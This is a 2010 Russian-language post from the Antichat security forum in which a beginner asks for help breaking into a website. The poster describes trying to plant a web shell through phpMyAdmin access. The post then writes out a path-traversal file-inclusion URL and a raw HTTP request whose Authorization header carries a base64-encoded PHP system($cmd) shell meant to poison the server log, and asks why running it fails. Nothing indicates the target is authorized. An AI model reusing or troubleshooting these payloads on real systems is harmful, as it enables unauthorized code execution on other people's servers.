HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница

Опции темы Поиск в этой теме Опции просмотра

Старый 24.11.2010, 20:58
beginner2010
Guest
Провел на форуме:
221894

Здравствуйте.

Я новичок, поэтому сильно не пинайте пожайлуста. У меня есть два вопроса:

1) Есть доступ к phpmyadmin сайта. Пытаюсь залить шелл в папку сайта, видимо не хватает прав. Заливаю в папку tmp, всё нормально загружается, просматриваю содержимое файла из phpmyadmin, всё нормально, но запустить скрипт из адресной строки никак не получается. Пытался загрузить шелл в папку phpmyadmin тоже видимо не хватает прав. Подскажите как быть в данной ситуации? Или ситуация безнадёжна?

2) Пытаюсь загрузить код шелла в лог файл сервера. Т.е http://домен/папка/файл.php?file=../../../..//var/www/usage/usage_201011.html

Отправляю запрос через телнет:

GET /файл.пхп HTTP/1.1

Host: www.домен

Authorization: Basic PD8gc3lzdGVtKCRjbWQpOyA/Pg==

Но потом при попытке загрузить шелл через curl ничего не происходит. В чём моя ошибка?

Заранее спасибо Всем кто ответит.